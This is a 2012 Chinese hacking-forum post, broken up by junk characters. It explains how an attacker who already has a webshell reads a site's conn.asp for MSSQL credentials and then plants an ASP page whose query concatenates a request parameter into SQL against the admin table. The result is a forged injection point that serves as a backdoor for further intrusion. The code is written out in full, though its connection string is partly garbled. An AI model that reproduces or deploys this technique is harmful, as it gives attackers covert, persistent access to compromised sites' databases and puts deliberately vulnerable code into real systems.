自己构造注入点方便入侵2 l- X: Q8 [! x" s( F9 e* J" D
7 Y' z! u9 x! x今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
) a& Q$ R0 d) j) ^& c; t
5 X' L! p/ [- Y7 P这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!; S0 {0 h# W7 [
$ i3 R/ a; ?& h
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和7 H ?: N" O# D# P- m1 `; \
8 C8 o# L" j$ N) D) P% o
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
3 C x' z+ J4 p3 L3 K
' R+ o1 l' b; _7 l因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:- q+ o9 i$ E3 v0 P& S! H
2 P: T6 D$ s3 b6 R程序代码& U0 Z: `7 o: K' E, X
<!--#include file="xx.asp"-->
8 e1 b. W; U+ L: B$ E<%' ~/ V* o* _4 A+ y) U/ y, ^: A2 K" @
set rs=server.createobject("ADODB.recordset")" H: u8 g; G% X) Z
id = request("id")- U+ M* H) X4 B8 {0 f9 }8 d
strSQL = "select * from admin where id=" & id. H! l9 B ?: a! L
rs.open strSQL,conn,1,3' A1 G! o3 W: [- ?. W1 }' r) \
rs.close
$ g9 {( M" b1 c9 u1 p6 {%>
" N" k* \9 M5 O, @: X) U) y& h) | P
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
. T6 |4 v$ M R
' N- b7 i+ a8 a* g! M# X你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!7 i+ L. ]" W5 m
6 T8 U0 O7 Z* r+ {( n
然后就要构造一个连接数据库的文件了,代码如下:+ @) o# \- ]2 O4 Y
程序代码2 ?4 o1 a) u9 l( ~' v
<%
, F( |, w4 Q4 _$ Y( p+ istrSQLServerName = "000.000.000.000" '服务器名称或地址0 \! _0 p, `: W7 e+ r
strSQLDBUserName = "sqlname" '数据库帐号
/ J; ?# q4 [0 O# D8 [) UstrSQLDBPassword = "sqlpass" '数据库密码
; h H9 ~. L! ? e. @ Z4 KstrSQLDBName = "sqldataname" '数据库名称( g, S# [0 y7 B' b1 X
Set conn = Server.CreateObject("ADODB.Connection")$ U6 i: `1 g/ m/ P6 }2 Z
strCon = " rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"& T0 A* ~) S! j% M3 G- i
conn.open strCon4 ?* }4 p* ?: c2 U
%>3 Z# J0 I" X- V+ Y% }9 `8 r" v
5 c* c0 U: a8 m) ?* E% q
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
( z) L h2 A; F" ?
* U& A6 G, J5 a0 E. [) Q0 K, O就这样,正常情况下,就OK了,伪造成功……" s: x7 S1 Y7 |0 o
* B. e ~: k! @& t- m
如果有什么问题可以提出来大家一起探讨解决。 |
发表于 2012-9-13 17:27:31
收藏
支持
反对